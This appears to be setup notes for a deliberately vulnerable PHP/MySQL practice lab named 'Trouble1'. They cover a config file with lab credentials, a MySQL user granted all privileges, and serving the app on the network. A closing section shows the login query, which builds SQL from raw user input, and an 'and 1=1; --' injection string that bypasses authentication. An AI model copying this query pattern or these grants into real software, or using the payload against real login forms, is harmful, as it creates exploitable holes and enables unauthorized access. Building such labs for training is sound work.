Trouble1

Configuration in config.php

<?php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'student');
   define('DB_PASSWORD', 'studentlab');
   define('DB_DATABASE', 'trouble1');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>

Create Mysql user student

CREATE USER 'student'@'localhost' IDENTIFIED BY 'studentlab';
GRANT ALL PRIVILEGES ON * . * TO 'student'@'localhost';

Set up the database

service mysql start
mysql -u root -p -e "create database trouble1"
mysql -u root -p trouble1 < lab.sql

# drop database
DROP DATABASE trouble1;

# cannot be accessed by Burp Suite
$ sudo php -S localhost:8000

# Make the server accessible on your network
$ sudo php -S 0.0.0.0:8000 

Mysql injection in Login.php

SELECT id FROM users WHERE username = '$myusername' and SHA1(CONCAT(password, '$passtoken'))='$mypassword'

SELECT id FROM users WHERE username = 'trouble1' and 1=1; -- 

SELECT id FROM admin WHERE username = 'trouble1' and 1=1; -- ' and SHA1(CONCAT(password, '$passtoken'))='$mypassword'